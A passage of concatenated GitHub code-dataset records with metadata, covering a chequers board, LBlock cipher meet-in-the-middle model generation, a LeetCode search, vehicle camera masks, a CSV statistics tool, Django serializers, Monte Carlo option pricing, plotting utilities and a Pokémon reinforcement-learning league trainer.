isinstance(self.grid[coord1][coord2],Piece):\n\t\t\t\t\traise NameError('We already have a piece at the current place')\n\t\t\t\t\n\t\t\t\telse:\t\n\t\t\t\t\tself.grid[coord1][coord2]=piece\n\t\t\t\n\t\t\telse:\n\t\t\t\traise NameError('Add piece did not get a piece as argument ')\t\n\t\t\n\t\telse:\n\t\t\traise NameError('Invalid coordinates given when adding a piece')\t \n \n\n \ndef main():\n\n\t\tboard1=Board('British')\n\t\tboard1.display_grid()\n\t\tpiece1=Piece('B','P')\n\t\tpiece2=Piece('W','P')\n\t\tboard1.add_piece(piece1,1,1)\n\t\tboard1.add_piece(piece2,6,4)\n\t\tboard1.display_grid()\t\n\n\t\treturn 0\n \n \n\nif __name__ == '__main__':\n import sys\n sys.exit(main())\n","repo_name":"sonia211/Chequers","sub_path":"source_code.py","file_name":"source_code.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31301088805","text":"from MITMLBlock import *\r\n\r\n\r\n\r\n\r\nLB = MITM_Lblock(\"LB\", 4, 64, 11,4,80)\r\nLB.genModel_keyrecovery(\".\\Solution\\LB_r5_r11_r5.lp\", 5, 5, 2)\r\nLB.genModel(\".\\Solution\\LB_r11.lp\", 11)\r\n\r\n\r\n\r\nfrom LblockDistinguisherDrawer import *\r\nfrom LblockKeyrecoveryDrawer import *\r\nfrom LblockKeyscheduleDrawer import *\r\nFigDistinguisher = DrawDistinguisher(\".\\Solution\\LB_r5_r11_r5.sol\", 11)\r\nFigDistinguisher.draw(\".\\Figure\\Distinguisher_LB.tex\")\r\n\r\nFigKeyrecovery = DrawKeyrecovery(\".\\Solution\\LB_r5_r11_r5.sol\", 11, 5, 5)\r\nFigKeyrecovery.draw(\".\\Figure\\Keyrecovey_LB.tex\")\r\nFigKeyrecovery.drawGuessedValue(\".\\Figure\\GuessedValue_LB.tex\")\r\n\r\nFigKeyschedule = DrawKeyschedule(\".\\Solution\\LB_r5_r11_r5.sol\", 11, 5, 5, 2)\r\nFigKeyschedule.draw(\".\\Figure\\Keyschedule_LB.tex\")\r\n\r\n","repo_name":"mhgharieb/MITM","sub_path":"Lblock/cmd_LB.py","file_name":"cmd_LB.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17214465334","text":"class Solution:\n def searchInsert(self, nums, target):\n \"\"\"\n Using Binary search, best run time 56ms beats 88%. It seems like for this question if you use linear search is faster than this binary search approach I guess it's because the test cases are all small, but if a larger array is served as one of the test case then I am sure that binary search is more efficient (tried using binary search, and best run time is 52ms beats 98%)\n \"\"\"\n left, right = 0, len(nums) - 1\n while left <= right:\n m = (left + right) // 2\n if nums[m] == target:\n return m\n elif nums[m] > target:\n right = m - 1\n else:\n left = m + 1\n \n if left > len(nums) - 1 or nums[left] >= target:\n return left\n else:\n return left + 1","repo_name":"yunkaiwang/LeetCodeSol","sub_path":"algorithms/tricky/35_SearchInsertPosition.py","file_name":"35_SearchInsertPosition.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8184611461","text":"import av2.utils.raster as raster_utils\nimport numpy as np\n\n\n# front-center camera has `portrait-mode` aspect ratio.\nTBV_RING_FRONT_CENTER_IMG_HEIGHT = 2048\nTBV_RING_FRONT_CENTER_IMG_WIDTH = 1550\n\nTBV_RING_REAR_RIGHT_IMG_HEIGHT = 775\nTBV_RING_REAR_RIGHT_IMG_WIDTH = 1024\n\nTBV_RING_REAR_LEFT_IMG_HEIGHT = 775\nTBV_RING_REAR_LEFT_IMG_WIDTH = 1024\n\n\ndef filter_out_egovehicle(uv: np.ndarray, camera_name: str) -> np.ndarray:\n \"\"\"Mask out the immediate foreground (pixels belonging to egovehicle) for any camera.\n\n Note: only 3 of the 7 ring cameras see the egovehicle in their field of view.\n Do not shoot ray into egovehicle hood or body (mask out foreground)\n\n Args:\n uv: array of shape (N,2)\n camera_name: string representing the name of a ring camera.\n\n Returns:\n logicals: array of shape (N,) corresponding to pixels NOT capturing the egovehicle.\n \"\"\"\n # update assumptions\n if camera_name == \"ring_front_center\":\n egovehicle_mask = get_z1_ring_front_center_mask()\n elif camera_name == \"ring_rear_right\":\n egovehicle_mask = get_z1_ring_rear_right_mask()\n elif camera_name == \"ring_rear_left\":\n egovehicle_mask = get_z1_ring_rear_left_mask()\n\n valid_mask = ~egovehicle_mask\n\n y = uv[:, 1]\n x = uv[:, 0]\n logicals = valid_mask[y, x] != 0\n return logicals\n\n\ndef get_z1_ring_front_center_mask() -> np.ndarray:\n \"\"\"Provide mask for the immediate foreground (pixels belonging to egovehicle), for the ring front center camera.\n\n Returns:\n mask: boolean array of shape (H,W)\n \"\"\"\n polygon_verts = np.array(\n [[0, 2048], [0, 1887], [303, 1804], [602, 1765], [951, 1780], [1256, 1800], [1544, 1880], [1549, 2048]]\n )\n mask = raster_utils.get_mask_from_polygons(\n [polygon_verts], img_h=TBV_RING_FRONT_CENTER_IMG_HEIGHT, img_w=TBV_RING_FRONT_CENTER_IMG_WIDTH\n )\n return mask.astype(bool)\n\n\ndef get_z1_ring_rear_right_mask() -> np.ndarray:\n \"\"\"Provide mask for the immediate foreground (pixels belonging to egovehicle), for the ring rear right camera.\n\n Returns:\n mask: boolean array of shape (H,W)\n \"\"\"\n polygon_verts = np.array(\n [[511, 1549], [511, 1540], [985, 1376], [1203, 1334], [1405, 1305], [2046, 1318], [2047, 1549]], dtype=float\n )\n polygon_verts *= 0.5 # rear has half the resolution as ring_front_center.\n mask = raster_utils.get_mask_from_polygons(\n [polygon_verts], img_h=TBV_RING_REAR_RIGHT_IMG_HEIGHT, img_w=TBV_RING_REAR_RIGHT_IMG_WIDTH\n )\n return mask.astype(bool)\n\n\ndef get_z1_ring_rear_left_mask() -> np.ndarray:\n \"\"\"Provide mask for the immediate foreground (pixels belonging to egovehicle), for the ring rear left camera.\n\n Returns:\n mask: boolean array of shape (H,W)\n \"\"\"\n polygon_verts = np.array(\n [\n [0, 1359],\n [12, 1359],\n [335, 1330],\n [620, 1322],\n [708, 1355],\n [889, 1364],\n [1036, 1376],\n [1161, 1397],\n [1539, 1540],\n [1539, 1549],\n [0, 1549],\n ],\n dtype=float,\n )\n polygon_verts *= 0.5 # rear has half the resolution as ring_front_center.\n mask = raster_utils.get_mask_from_polygons(\n [polygon_verts], img_h=TBV_RING_REAR_LEFT_IMG_HEIGHT, img_w=TBV_RING_REAR_LEFT_IMG_WIDTH\n )\n return mask.astype(bool)\n","repo_name":"johnwlambert/tbv","sub_path":"tbv/utils/z1_egovehicle_mask_utils.py","file_name":"z1_egovehicle_mask_utils.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"53"} +{"seq_id":"9143168749","text":"#importing pandas for reading of csv file\r\nimport pandas as pd\r\nclass Solution:\r\n def __init__(self):\r\n self.data=pd.read_csv(\"C:/Users/DELL/Downloads/book.csv\") # reading csv file\r\n print(self.data)\r\n\r\n def cal_mean(self,cll): # for calculating mean of specific column\r\n D_Mean=self.data[cll].mean()\r\n return D_Mean\r\n\r\n def cal_median(self,cll): # for calculating median of specific column\r\n D_median=self.data[cll].median()\r\n return D_median\r\n\r\n def speci_val(self,val, cl): # for filtering records matching with specific column\r\n return self.data.loc[self.data[cl] ==val] \r\n \r\n def particular_range(self,val, cl): # for filtering records matching with specific column in a range\r\n n=[float(val)-(5/100)*float(val),float(val)+(5/100)*float(val)]\r\n return self.data.loc[self.data[cl] <n[1]] [self.data[cl] >n[0]]\r\n\r\n def change_specific(self, cl): # for calculating change in specific column\r\n self.data[\"new\"]=abs(self.data[cl]-self.cal_mean(cl))\r\n return self.data[\"new\"]\r\n\r\n def average(self): # calculating average\r\n print(\"inside\")\r\n #Average_change=sum(self.data[\"new\"])/len(self.data[\"new\"])\r\n if \"new\" in self.data: # if data change column is availavble then calculate average of change in that column \r\n Average_change= self.cal_mean(\"new\")\r\n return Average_change\r\n else: \r\n return \"no changes detected\"\r\n \r\n def Min(self): # calculating Minimum\r\n if \"new\" in self.data: # if data change column is availavble then calculate Minimum of change in that column\r\n Minimum_change=min(self.data[\"new\"])\r\n return Minimum_change\r\n else: \r\n return \"no changes detected\"\r\n\r\n \r\n def Max(self): # calculating Maximum\r\n if \"new\" in self.data: # if data change column is availavble then calculate Maximum of change in that column\r\n print(\"inside\")\r\n Maximum_change=max(self.data[\"new\"])\r\n return Maximum_change\r\n else: \r\n return \"no changes detected\"\r\n \r\n # def printdata(self):\r\n # print(self.data.head())\r\n\r\nobj = Solution()\r\nflag=True\r\nwhile flag:\r\n print(\"The Following are the features available:\")\r\n print(\"1.Mean of a specific column\\n\" \"2.Median of a specific column\\n\" \"3.Filter all records\\n\" \"4.Filter in Range\\n\" \"5.changes in value\\n\" \"6 av change \\n\" \"7 min change\\n\" \"8 max change\\n\")\r\n a=input(\"enter your options:\")\r\n print(\"You have chosen :\" +a)\r\n a = int(a)\r\n# choosing specific values and then comparing\r\n if a == 1: #case 1 -> calculating mean for specific column\r\n x=input(\"Enter specific column :\")\r\n print(\"Mean: \", obj.cal_mean(x))\r\n \r\n elif a==2: #case 2 -> calculating median for specific column\r\n x=input(\"Enter specific column :\")\r\n # obj.cal_median(x)\r\n print(\"Mean: \", obj.cal_median(x))\r\n \r\n elif a==3: #case 3 -> filtering particular value by column and its name \r\n x=input(\"Enter specific value :\")\r\n cl = input(\"Enter specific column:\")\r\n print(\"Speci value\\n\", obj.speci_val(int(x), cl))\r\n\r\n elif a==4: #case 4 -> filtering particular value by column and its name in a range\r\n cl=input(\"Enter specific column :\")\r\n val=input(\"Enter specific value :\")\r\n print(\"Range\\n\", obj.particular_range(int(val), cl))\r\n\r\n elif a==5: #case 5-> calculating changes in value by specific column\r\n x=input(\"Enter specific column :\")\r\n print(\"change\\n\", obj.change_specific(x))\r\n # print(obj.printdata())\r\n a = input(\" Calculate Further !!!! \\n 6 Average change: \\n 7 MIN change: \\n 8 MAX change: \\n\")\r\n a = int(a)\r\n\r\n if a == 6: # changes values present then calculating average ,minimum and maximum\r\n print(\"Average: \", obj.average()) \r\n\r\n elif a==7:\r\n print(\"MIN change: \", obj.Min())\r\n\r\n elif a==8:\r\n print(\"MAX change: \", obj.Max())\r\n\r\n else:\r\n print(\"There is no such value\")\r\n\r\n op=input(\"Do you want to continue further? \\n 1. continue \\n 2. exit \\n\")\r\n if op==\"1\":\r\n flag=True\r\n else:\r\n flag=False\r\n","repo_name":"Hirendra12784/utitlity","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":4476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12572698239","text":"from rest_framework import serializers\nfrom .models import Spectator, Task, Actor, User, Director, Game, User\n\n\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.validators import UnicodeUsernameValidator\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = get_user_model()\n # fiels gibt die eigenschaft an die seriasiert werden müssen\n fields = ['id', 'username', 'is_staff', 'groups']\n extra_kwargs = {\n 'username': {\n 'validators': [UnicodeUsernameValidator()],\n }\n }\n\n\nclass DirectorSerializer(serializers.ModelSerializer):\n # userserializser wird für das User feld benötigt\n user = UserSerializer(many=False)\n class Meta:\n model = Director\n fields = ['id', 'user']\n\n \n\nclass GameSerializer(serializers.ModelSerializer):\n director = DirectorSerializer(many=False)\n class Meta:\n model = Game\n fields = ['id', 'name', 'duration', 'director', 'status']\n \n #Create-Methode überschrieben bei Create Aufruf von Game\n def create(self, validated_data):\n director_data = validated_data.pop('director')\n user_data = director_data.pop('user')\n username = user_data.pop('username')\n user = User.objects.get(username=username)\n director = Director.objects.get(user=user)\n duration = validated_data.pop('duration')\n gamename = validated_data.pop('name')\n game = Game.objects.create(director=director, duration=duration, name=gamename)\n game.save()\n return game\n\n\nclass SpectatorSerializer(serializers.ModelSerializer):\n user = UserSerializer(many=False)\n game = GameSerializer(many=False)\n class Meta:\n model = Spectator\n fields = ['id', 'user', 'game']\n\n\nclass ActorSerializer(serializers.ModelSerializer):\n user = UserSerializer(many=False)\n game = GameSerializer(many=False)\n class Meta:\n model = Actor\n fields = ['id', 'user', 'game']\n\n # Update-Methode überschrieben wenn Actor das Game gesetzt bekommt\n def update(self, instance, validated_data):\n user_data = validated_data.pop('user')\n username = user_data.pop('username')\n user = User.objects.get(username=username)\n actor = Actor.objects.get(user=user)\n\n game_data = validated_data.pop('game')\n name = game_data.pop('name')\n game = Game.objects.get(name=name)\n\n\n actor.game = game\n actor.save()\n return actor\n\nclass TaskSerializer(serializers.ModelSerializer):\n #Da Objekte von anderen Models übergeben werden,\n #benötigt der TaskSerializer auch den Game-, User-\n #und ActorSerializer\n game = GameSerializer(many=False)\n writer = UserSerializer(many=False)\n actors = ActorSerializer(many=True, required=False)\n\n #Meta legt fest welche Felder mit im JSON mitgesendet werden\n class Meta:\n model = Task\n fields = ['id', 'text', 'status', 'game', 'writer', 'actors']\n #Create Methode wird überschrieben, da der Standardserializer\n #keine M:N Beziehung serializiert\n def create(self, validated_data):\n #aus dem JSON werden die einzelnen Eigenschaften geholt\n text = validated_data.pop('text')\n status = validated_data.pop('status')\n game_data = validated_data.pop('game')\n gamename = game_data.pop('name')\n #anhand der gamedaten wird das game objekt geholt\n game = Game.objects.get(name=gamename)\n\n writer_data = validated_data.pop('writer')\n username = writer_data.pop('username')\n #anhand der Writer wird der Uer geholt\n writer = User.objects.get(username=username)\n\n\n actors_data = validated_data.pop('actors')\n\n #mit den bisher serialisierten Daten wird die Aufgabe estellt.\n task = Task.objects.create(text=text, status=status, writer=writer, game=game)\n #da mehrere Actors bei einer Task eingetragen sein können\n #wird über die Actors_data interriert und jder Actor der Task hinzugefügt\n for actor_data in actors_data:\n user_data = actor_data.pop('user')\n username = user_data.pop('username')\n user = User.objects.get(username=username)\n actor = Actor.objects.get(user=user)\n task.actors.add(actor)\n #Das Objekt wird gespeichert, erst dann bekommt die Task eine ID\n task.save()\n #und zurückgesendet\n return task\n\n # Update-Methode überschrieben wenn Task umgedatet wird\n def update(self, instance, validated_data):\n instance.text = validated_data.pop('text')\n instance.status = validated_data.pop('status')\n game_data = validated_data.pop('game')\n gamename = game_data.pop('name')\n game = Game.objects.get(name=gamename)\n instance.game=game\n\n writer_data = validated_data.pop('writer')\n username = writer_data.pop('username')\n writer = User.objects.get(username=username)\n instance.writer=writer\n actors_data = validated_data.pop('actors')\n for actor_data in actors_data:\n user_data = actor_data.pop('user')\n username = user_data.pop('username')\n user = User.objects.get(username=username)\n actor = Actor.objects.get(user=user)\n instance.actors.add(actor)\n\n instance.save()\n return instance\n\n","repo_name":"hennabanana/ImproApp","sub_path":"improproject/backend/api/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":6274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30980594084","text":"import random\nfrom math import exp\nfrom finance import *\nfrom matrix import *\n\n\n\n\n\n\n\n\ndef monte_carlo(option:Option, number_of_trials:int = 16):\n \"\"\"\n Estimates the value of a european barrier-less option\n :param option: the option\n :param number_of_trials: number of randomly generated asset paths to take\n :return: a tuple, containing the estimated value and 95% confidence interval\n \"\"\"\n\n estimated_values = []\n for i in range(number_of_trials):\n ep = random.normalvariate(0,1)\n Si = option.spot_price*exp((option.interest_rate-0.5*option.volatility**2)*option.time_until_expiry +\n ep*option.volatility*(option.time_until_expiry**0.5))\n Vi = option.payoff(Si)\n estimated_values.append(exp(-1*option.interest_rate*option.time_until_expiry)*Vi)\n am = sum(estimated_values)/number_of_trials\n b2m = (1/(number_of_trials-1)) * sum([(Vi - am)**2 for Vi in estimated_values])\n bm = b2m**0.5\n return am, (am - 1.96*bm*(number_of_trials**-0.5),am + 1.96*bm*(number_of_trials**-0.5))\n\n\ndef monte_carlo_barrier(option: Option, number_of_trials: int = 16, number_of_steps_per_path: int = 16):\n \"\"\"\n Estimates the value of a european barrier option\n :param option: the option\n :param number_of_trials: number of randomly generated asset paths to take\n :param number_of_steps_per_path: the number of steps per path\n :return: a tuple, containing the estimated value and 95% confidence interval\n \"\"\"\n estimated_values = []\n dt = option.time_until_expiry/number_of_steps_per_path\n lower_barrier = option.lower_barrier\n upper_barrier = option.upper_barrier\n for i in range(number_of_trials):\n path = [option.spot_price]\n valid_path = True\n for step in range(number_of_steps_per_path):\n ep = random.normalvariate(0,1)\n Si = path[-1]*exp((option.interest_rate-0.5*option.volatility**2)*dt + ep*option.volatility*(dt**0.5))\n if (lower_barrier is not None and Si < lower_barrier) or (upper_barrier is not None and Si > upper_barrier):\n valid_path = False\n break#this path is ignored as it passes though a barrier\n path.append(Si)\n if valid_path:\n Vi = option.payoff(path[-1])\n estimated_values.append(exp(-1*option.interest_rate*option.time_until_expiry)*Vi)\n else:\n estimated_values.append(0)\n am = sum(estimated_values)/number_of_trials\n b2m = (1/(number_of_trials-1)) * sum([(Vi - am)**2 for Vi in estimated_values])\n bm = b2m**0.5\n return am, (am - 1.96*bm*(number_of_trials**-0.5),am + 1.96*bm*(number_of_trials**-0.5))\n\n\n\n\n\n\"\"\"\ndef arithmetic_avg(x):\n return sum(x)/len(x)\n\ndef geometric_avg(x):\n log_list = [log(i) for i in x]\n return exp(arithmetic_avg(log_list))\n\n\ndef monte_carlo_asian(T,sigma,r,S,E,payoff,averaging_function=geometric_avg,number_of_trials = 16,number_of_steps_per_path=16):\n estimated_values = []\n dt = T/number_of_steps_per_path\n for i in range(number_of_trials):\n path = [S]\n for step in range(number_of_steps_per_path):\n ep = random.normalvariate(0,1)\n Si = path[-1]*exp((r-0.5*sigma**2)*dt + ep*sigma*(dt**0.5))\n path.append(Si)\n avg = averaging_function(path)\n Vi = payoff(path[-1],avg,E)\n estimated_values.append(exp(-1*r*T)*Vi)\n am = sum(estimated_values)/number_of_trials\n b2m = (1/(number_of_trials-1)) * sum([(Vi - am)**2 for Vi in estimated_values])\n bm = b2m**0.5\n return am, (am - 1.96*bm*(number_of_trials**-0.5),am + 1.96*bm*(number_of_trials**-0.5))\n\n\ndef monte_carlo_american(T,sigma,r,q,S,E,payoff,number_of_paths = 16,number_of_steps_per_path=16):\n dt = T/number_of_steps_per_path\n estimated_values = []\n e = [exp(-1*r*dt*i) for i in range(number_of_steps_per_path+1)]\n\n\n for i in range(number_of_paths):\n path = [S]\n for step in range(number_of_steps_per_path):\n ep = random.normalvariate(0,1)\n dX = random.normalvariate(0,dt)\n Si = path[-1]*exp((r - 0.5 * sigma ** 2) * dt + ep * sigma * (dt ** 0.5))#path[-1]*(1 + (r*dt + sigma*dX))# #exp((r - 0.5 * sigma ** 2) * dt + ep * sigma * (dt ** 0.5))\n path.append(Si)\n\n option_values = [e[i]*payoff(path[i],E) for i in range(number_of_steps_per_path+1)]\n print(path,\"\\n\",option_values,max(option_values))\n estimated_values.append(max(option_values))\n return sum(estimated_values)/len(estimated_values)\n\n\n\n\ndef plot():\n import matplotlib.pyplot as plt\n S = 10\n E = 9\n sigma = 0.1\n r = 0.06\n T = 1\n q = 0\n sol = call_exact_value(S, E, 0, T, sigma, r)\n values = []\n lower_c_i = []\n upper_c_i = []\n space = range(3, 15)\n for i in space:\n val, conv_int = monte_carlo(T, sigma, r, q, S, E, lambda x:max(x-E,0), number_of_trials=2 ** i)\n values.append(val)\n lower_c_i.append(conv_int[0])\n upper_c_i.append(conv_int[1])\n plt.fill_between(space, lower_c_i, upper_c_i, alpha=0.2, label=\"95% confidence interval\", color='tab:orange')\n plt.plot(space, values, label=\"Estimated value\", color='orange')\n plt.plot(space, [sol for x in space], linestyle='dashed', label=\"True solution\")\n plt.xlabel('Amount of random paths taken')\n plt.ylabel('Estimated Value')\n plt.legend(loc='upper right')\n labels = [2 ** i for i in space]\n plt.xticks(space, labels)\n plt.show()\n\n\ndef multivariable_monte_carlo(S_values,sigmas,rho_matrix: Matrix,r,T,payoff,number_of_trials = 16):\n estimated_option_values = []\n M = rho_matrix.get_chomsky_decomp()\n for i in range(number_of_trials):\n ep_values = []\n end_S_values = []\n for i in range(len(S_values)):\n\n ep = random.normalvariate(0, 1)\n ep_values.append(ep)\n\n corrilated_ep_values = []\n ep_vector = Matrix(ep_values)\n ep_vector.transpose()\n\n corrilated_ep_values_vector = M*ep_vector\n for i in range(len(S_values)):\n S_val = S_values[i]*exp((r-0.5*sigmas[i]**2)*T + corrilated_ep_values_vector[i]*sigmas[i]*(T**0.5))\n end_S_values.append(S_val)\n\n estimated_option_values.append(payoff(end_S_values))\n\n return exp(-1*r * T) * sum(estimated_option_values)/len(estimated_option_values)\n\"\"\"\n\n\n","repo_name":"JamesWood97/James-Wood-Option-valuation","sub_path":"montecarlo.py","file_name":"montecarlo.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12657847436","text":"n=int(input())\nA=list(map(int,input().split()))\nmi=max(A)\nans=0\nfor i in range(n):\n for j in list(range(n))[i:]:\n if i==j:\n mi=A[i]\n mi=min(mi,A[j])\n ans=max(ans,mi*(j-i+1))\nprint(ans)","repo_name":"mono-0812/procon","sub_path":"atcoder.jp/abc189/abc189_c/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7428888241","text":"## Some Based on utils file in Innvestigate lib. I just modified it as per my use.\n## Credits to them.\n\nfrom __future__ import\\\n absolute_import, print_function, division, unicode_literals\nfrom future.utils import raise_with_traceback, raise_from\n# catch exception with: except Exception as e\nfrom builtins import range, map, zip, filter\nfrom io import open\nimport six\n# End: Python 2/3 compatability header small\n\nimport sys\nif sys.platform == \"darwin\":\n import matplotlib\n matplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom matplotlib.colors import ListedColormap\nfrom PIL import Image\n\nimport numpy as np\nimport os\nimport PIL.Image\nimport shutil\nimport ipdb\nimport time\n\nimport keras\nfrom keras.models import Model\nfrom keras.layers import Input, Flatten, Conv2D\n\n\ndef mkdir_p(mypath):\n\n '''Creates a directory. equivalent to using mkdir -p on the command line'''\n\n from errno import EEXIST\n from os import makedirs, path\n\n try:\n makedirs(mypath)\n except OSError as exc: # Python >2.5\n if exc.errno == EEXIST and path.isdir(mypath):\n pass\n else:\n raise\n\n return mypath\n\ndef plot_image_grid(grid, folderName,\n row_labels_left,\n row_labels_right,\n col_labels,\n file_name=None,\n dpi=227,\n ):\n ## Assuming there is only going to be one row (and many coloumns) in the grid\n\n plt.rcParams.update({'font.size': 5})\n plt.rc(\"font\", family=\"sans-serif\")\n plt.rc(\"axes.spines\", top=True, right=True, left=True, bottom=True)\n # print('Plotting the figure')\n image_size = (grid[0][0]).shape[0]\n\n nRows = len(grid)\n nCols = len(grid[0])\n\n # ipdb.set_trace()\n if image_size > 5:\n tRows = nRows + 3 # total rows\n grid.append(grid[0])\n row_labels_left.append(row_labels_left[0])\n row_labels_right.append(row_labels_right[0])\n else:\n tRows = nRows + 2 # total rows\n tCols = nCols + 2 # total cols\n\n wFig = tCols # Figure width (two more than nCols because I want to add ylabels on the very left and very right of figure)\n hFig = tRows # Figure height (one more than nRows becasue I want to add xlabels to the top of figure)\n\n fig, axes = plt.subplots(nrows=tRows, ncols=tCols, figsize=(wFig, hFig))\n fig.subplots_adjust(left=0, bottom=0, right=1, top=1, wspace=0, hspace=0)\n axes = np.reshape(axes, (tRows, tCols))\n\n scale = 0.75\n\n for r in range(tRows):\n # if r <= 1:\n for c in range(tCols):\n ax = axes[r][c]\n\n l, b, w, h = ax.get_position().bounds\n\n ax.set_position([l, b, w * scale, h * scale])\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_visible(False)\n ax.spines['left'].set_visible(False)\n ax.set_xticks([])\n ax.set_yticks([])\n\n if r > 0 and c > 0 and r < tRows - 1 and c < tCols - 1:\n # ipdb.set_trace()\n img_data = grid[r - 1][c - 1]\n abs_mn = round(np.amin(img_data), 3)\n abs_mx = round(np.amax(img_data), 3)\n\n if image_size > 5:\n if r == tRows-2:\n centre = image_size//2\n diff = 2\n img_data = img_data[centre-diff:centre+diff+1, centre-diff:centre+diff+1]\n\n if c == 1:\n cMap = 'gray'\n # print('Min val is: ', abs_mn)\n # cen = img_data.shape[0]//2\n # print('Centre pixel value is: ', (img_data[cen, cen]*255).astype('int'))\n im = ax.imshow(img_data, interpolation='none', cmap=cMap, vmin=abs_mn, vmax=abs_mx)\n else:\n uP = cm.get_cmap('Reds', 128)\n dowN = cm.get_cmap('Blues_r', 128)\n newcolors = np.vstack((\n dowN(np.linspace(0, 1, 127)),\n uP(np.linspace(0, 1, 128))\n ))\n cMap = ListedColormap(newcolors, name='RedBlues')\n abs_mx = max(abs(abs_mn), abs(abs_mx))\n im = ax.imshow(img_data, interpolation='none', cmap=cMap, vmin=-abs_mx, vmax=abs_mx)\n\n zero = 0\n if not r - 1:\n\n if col_labels != []:\n ax.set_title(col_labels[c - 1] + '\\nmax' + str(abs_mx) + '\\nmin' + str(abs_mn),\n rotation=45,\n horizontalalignment='left',\n verticalalignment='bottom')\n\n if c == tCols - 2:\n\n if row_labels_right != []:\n txt_right = [l + '\\n' for l in row_labels_right[r - 1]]\n ax2 = ax.twinx()\n # ax2.axis('off')\n\n ax2.set_xticks([])\n ax2.set_yticks([])\n ax2.spines['top'].set_visible(False)\n ax2.spines['right'].set_visible(False)\n ax2.spines['bottom'].set_visible(False)\n ax2.spines['left'].set_visible(False)\n ax2.set_ylabel(''.join(txt_right), rotation=0,\n verticalalignment='center',\n horizontalalignment='left', )\n\n if not c - 1:\n\n if row_labels_left != []:\n txt_left = [l + '\\n' for l in row_labels_left[r - 1]]\n ax.set_ylabel(''.join(txt_left),\n rotation=0,\n verticalalignment='center',\n horizontalalignment='right', )\n\n # else:\n if c != 1:\n w_cbar = 0.005\n h_cbar = h * scale\n b_cbar = b\n l_cbar = l + scale * w + 0.001\n cbaxes = fig.add_axes([l_cbar, b_cbar, w_cbar, h_cbar])\n cbar = fig.colorbar(im, cax=cbaxes)\n cbar.outline.set_visible(False)\n cbar.ax.tick_params(labelsize=4, width=0.3, length=1.5)\n cbar.set_ticks([-abs_mx, zero, abs_mx])\n cbar.set_ticklabels([-abs_mx, zero, abs_mx])\n #####################################################################################\n\n dir_path = folderName\n print('Saving figure to {}'.format(dir_path + file_name))\n\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n\n plt.savefig((dir_path + '/' + file_name), orientation='landscape', dpi=dpi / scale, transparent=True, frameon=False)\n plt.close(fig)\n\n\ndef preprocess_model_for_lime(model, input_shape=(227, 227, 3)):\n input = Input(shape=input_shape, name='image_input')\n x = Conv2D(1, kernel_size=(1, 1),\n input_shape=input_shape,\n kernel_initializer=keras.initializers.Constant(value=1 / 3),\n )(input)\n x = Flatten()(x)\n x = model(x)\n\n newModel = Model(inputs=input, outputs=x)\n\n return newModel\n\n## This is extra function. Not being used anywhere.\n## It is there just for future reference\ndef save_lime_mask(mask, output_dir):\n output_dir = output_dir + 'lime_results/'\n r_str = time.strftime(\"%Y_%m_%d-%H:%M:%S\")\n print('Saving extra LIME results to: ', output_dir)\n mkdir_p(output_dir)\n mask = Image.fromarray(np.uint8(mask*255))\n mask.save(output_dir + 'lime_mask_' + r_str + '.png')\n\n","repo_name":"bnaman50/center-pixel-model","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32591185964","text":"from typing import Optional\n\nfrom poke_env.player_configuration import PlayerConfiguration\nfrom torch import nn\n\nfrom champion_league.agent.ppo import PPOAgent\nfrom champion_league.config.load_configs import save_args\nfrom champion_league.env import LeaguePlayer\nfrom champion_league.env import RLPlayer\nfrom champion_league.matchmaking.league_skill_tracker import LeagueSkillTracker\nfrom champion_league.matchmaking.matchmaker import MatchMaker\nfrom champion_league.preprocessor import Preprocessor\nfrom champion_league.reward.reward_scheme import RewardScheme\nfrom champion_league.teams.team_builder import AgentTeamBuilder\nfrom champion_league.training.league.league_args import LeagueArgs\nfrom champion_league.training.league.league_epoch import league_epoch\nfrom champion_league.training.league.utils import beating_league\nfrom champion_league.training.league.utils import move_to_league\nfrom champion_league.utils.directory_utils import PokePath\nfrom champion_league.utils.server_configuration import DockerServerConfiguration\nfrom champion_league.utils.step_counter import StepCounter\n\n\ndef league_play(\n preprocessor: Preprocessor,\n network: nn.Module,\n league_path: PokePath,\n args: LeagueArgs,\n epoch: Optional[int] = 0,\n):\n \"\"\"Main loop for training a league agent.\n\n Args:\n league_path: Path to the league directory\n preprocessor: The preprocessor that this agent will be using to convert Battle objects to tensors.\n network: The network that will be training.\n args: Hyperparameters used for training.\n epoch: If we're resuming, this is the epoch we're resuming from.\n \"\"\"\n agent = PPOAgent(\n league_path=league_path, tag=args.tag, resume=True, **args.agent_args\n )\n\n step_counter = StepCounter()\n skill_tracker = LeagueSkillTracker(league_path, args.resume)\n matchmaker = MatchMaker(\n args.probs[\"self_play_prob\"], args.probs[\"league_play_prob\"], league_path\n )\n team_builder = AgentTeamBuilder(\n agent_path=league_path.agent, battle_format=args.battle_format\n )\n\n team_builder.save_team()\n player = RLPlayer(\n battle_format=args.battle_format,\n preprocessor=preprocessor,\n reward_scheme=RewardScheme(args.rewards),\n 